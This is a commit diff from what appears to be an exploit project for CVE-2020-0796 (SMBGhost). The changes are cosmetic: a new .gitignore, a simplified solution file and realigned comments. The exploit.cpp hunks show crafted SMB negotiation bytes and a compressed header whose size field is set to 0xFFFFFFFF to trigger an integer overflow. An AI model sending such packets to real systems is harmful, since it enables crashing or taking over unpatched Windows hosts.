Fix comment indentation

.gitignore

@@ -0,0 +1,6 @@
+################################################################################
+# This .gitignore file was automatically created by Microsoft(R) Visual Studio.
+################################################################################
+
+/.vs/cve-2020-0796-local/v16
+/cve-2020-0796-local/x64/Debug

cve-2020-0796-local.sln

@@ -1,31 +1,25 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Version 16
-VisualStudioVersion = 16.0.28803.202
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2020-0796-local", "cve-2020-0796-local\cve-2020-0796-local.vcxproj", "{57A5009C-067D-456E-9241-3AC0E704FA7C}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|x64 = Debug|x64
-		Debug|x86 = Debug|x86
-		Release|x64 = Release|x64
-		Release|x86 = Release|x86
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Debug|x64.ActiveCfg = Debug|x64
-		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Debug|x64.Build.0 = Debug|x64
-		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Debug|x86.ActiveCfg = Debug|Win32
-		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Debug|x86.Build.0 = Debug|Win32
-		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Release|x64.ActiveCfg = Release|x64
-		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Release|x64.Build.0 = Release|x64
-		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Release|x86.ActiveCfg = Release|Win32
-		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Release|x86.Build.0 = Release|Win32
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-	GlobalSection(ExtensibilityGlobals) = postSolution
-		SolutionGuid = {816C38A9-D1B2-47D3-BBC2-090DD4541869}
-	EndGlobalSection
-EndGlobal
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.28803.202
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2020-0796-local", "cve-2020-0796-local\cve-2020-0796-local.vcxproj", "{57A5009C-067D-456E-9241-3AC0E704FA7C}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Debug|x64.ActiveCfg = Debug|x64
+		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Debug|x64.Build.0 = Debug|x64
+		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Release|x64.ActiveCfg = Release|x64
+		{57A5009C-067D-456E-9241-3AC0E704FA7C}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {816C38A9-D1B2-47D3-BBC2-090DD4541869}
+	EndGlobalSection
+EndGlobal

cve-2020-0796-local/exploit.cpp

@@ -76,20 +76,20 @@ int send_negotiation(SOCKET sock) {
 
 	const uint8_t buf[] = {
 		/* NetBIOS Wrapper */
-		0x00,					/* session */
-		0x00, 0x00, 0xC4,		/* length */
+		0x00,                   /* session */
+		0x00, 0x00, 0xC4,       /* length */
 
 		/* SMB Header */
 		0xFE, 0x53, 0x4D, 0x42, /* protocol id */
-		0x40, 0x00,				/* structure size, must be 0x40 */
-		0x00, 0x00,				/* credit charge */
-		0x00, 0x00,				/* channel sequence */
-		0x00, 0x00,				/* channel reserved */
-		0x00, 0x00,				/* command */
-		0x00, 0x00,				/* credits requested */
+		0x40, 0x00,             /* structure size, must be 0x40 */
+		0x00, 0x00,             /* credit charge */
+		0x00, 0x00,             /* channel sequence */
+		0x00, 0x00,             /* channel reserved */
+		0x00, 0x00,             /* command */
+		0x00, 0x00,             /* credits requested */
 		0x00, 0x00, 0x00, 0x00, /* flags */
 		0x00, 0x00, 0x00, 0x00, /* chain offset */
-		0x00, 0x00, 0x00, 0x00,	/* message id */
+		0x00, 0x00, 0x00, 0x00, /* message id */
 		0x00, 0x00, 0x00, 0x00, 
 		0x00, 0x00, 0x00, 0x00, /* reserved */
 		0x00, 0x00, 0x00, 0x00, /* tree id */
@@ -101,36 +101,36 @@ int send_negotiation(SOCKET sock) {
 		0x00, 0x00, 0x00, 0x00,
 
 		/* SMB Negotiation Request */
-		0x24, 0x00,				/* structure size */
-		0x08, 0x00,				/* dialect count, 8 */
-		0x00, 0x00,				/* security mode */
-		0x00, 0x00,				/* reserved */
-		0x7F, 0x00, 0x00, 0x00,	/* capabilities */
+		0x24, 0x00,             /* structure size */
+		0x08, 0x00,             /* dialect count, 8 */
+		0x00, 0x00,             /* security mode */
+		0x00, 0x00,             /* reserved */
+		0x7F, 0x00, 0x00, 0x00, /* capabilities */
 		0x01, 0x02, 0xAB, 0xCD, /* guid */
 		0x01, 0x02, 0xAB, 0xCD,
 		0x01, 0x02, 0xAB, 0xCD,
 		0x01, 0x02, 0xAB, 0xCD,
-		0x78, 0x00,				/* negotiate context */
-		0x00, 0x00,				/* additional padding */
-		0x02, 0x00,				/* negotiate context count */
-		0x00, 0x00,				/* reserved 2 */
-		0x02, 0x02,				/* dialects, SMB 2.0.2 */
-		0x10, 0x02,				/* SMB 2.1 */
-		0x22, 0x02,				/* SMB 2.2.2 */
-		0x24, 0x02,				/* SMB 2.2.3 */
-		0x00, 0x03,				/* SMB 3.0 */
-		0x02, 0x03,				/* SMB 3.0.2 */
-		0x10, 0x03,				/* SMB 3.0.1 */
-		0x11, 0x03,				/* SMB 3.1.1 */
-		0x00, 0x00, 0x00, 0x00,	/* padding */
+		0x78, 0x00,             /* negotiate context */
+		0x00, 0x00,             /* additional padding */
+		0x02, 0x00,             /* negotiate context count */
+		0x00, 0x00,             /* reserved 2 */
+		0x02, 0x02,             /* dialects, SMB 2.0.2 */
+		0x10, 0x02,             /* SMB 2.1 */
+		0x22, 0x02,             /* SMB 2.2.2 */
+		0x24, 0x02,             /* SMB 2.2.3 */
+		0x00, 0x03,             /* SMB 3.0 */
+		0x02, 0x03,             /* SMB 3.0.2 */
+		0x10, 0x03,             /* SMB 3.0.1 */
+		0x11, 0x03,             /* SMB 3.1.1 */
+		0x00, 0x00, 0x00, 0x00, /* padding */
 
 		/* Preauth context */
-		0x01, 0x00,				/* type */
-		0x26, 0x00,				/* length */
+		0x01, 0x00,             /* type */
+		0x26, 0x00,             /* length */
 		0x00, 0x00, 0x00, 0x00, /* reserved */
-		0x01, 0x00,				/* hash algorithm count */
-		0x20, 0x00,				/* salt length */
-		0x01, 0x00,				/* hash algorith, SHA512 */
+		0x01, 0x00,             /* hash algorithm count */
+		0x20, 0x00,             /* salt length */
+		0x01, 0x00,             /* hash algorith, SHA512 */
 		0x00, 0x00, 0x00, 0x00, /* salt */
 		0x00, 0x00, 0x00, 0x00,
 		0x00, 0x00, 0x00, 0x00,
@@ -139,17 +139,17 @@ int send_negotiation(SOCKET sock) {
 		0x00, 0x00, 0x00, 0x00,
 		0x00, 0x00, 0x00, 0x00,
 		0x00, 0x00, 0x00, 0x00,
-		0x00, 0x00,				/* pad */
+		0x00, 0x00,             /* pad */
 
 		/* Compression context */
-		0x03, 0x00,				/* type */
-		0x0E, 0x00,				/* length */
-		0x00, 0x00, 0x00, 0x00,	/* reserved */
-		0x02, 0x00,				/* compression algorithm count */
-		0x00, 0x00,				/* padding */
-		0x01, 0x00, 0x00, 0x00,	/* flags */
-		0x02, 0x00,				/* LZ77 */
-		0x03, 0x00,				/* LZ77+Huffman */
+		0x03, 0x00,             /* type */
+		0x0E, 0x00,             /* length */
+		0x00, 0x00, 0x00, 0x00, /* reserved */
+		0x02, 0x00,             /* compression algorithm count */
+		0x00, 0x00,             /* padding */
+		0x01, 0x00, 0x00, 0x00, /* flags */
+		0x02, 0x00,             /* LZ77 */
+		0x03, 0x00,             /* LZ77+Huffman */
 		0x00, 0x00, 0x00, 0x00, /* padding */
 		0x00, 0x00, 0x00, 0x00
 	};
@@ -173,8 +173,8 @@ int send_compressed(SOCKET sock, unsigned char* buffer, ULONG len) {
 		/* SMB Header */
 		0xFC, 0x53, 0x4D, 0x42, /* protocol id */
 		0xFF, 0xFF, 0xFF, 0xFF, /* original decompressed size, trigger arithmetic overflow */
-		0x02, 0x00,				/* compression algorithm, LZ77 */
-		0x00, 0x00,				/* flags */
+		0x02, 0x00,             /* compression algorithm, LZ77 */
+		0x00, 0x00,             /* flags */
 		0x10, 0x00, 0x00, 0x00, /* offset */
 	};
 
@@ -358,4 +358,4 @@ int main(int argc, char* argv[]) {
 
 	WSACleanup();
 	return EXIT_SUCCESS;
-}
+}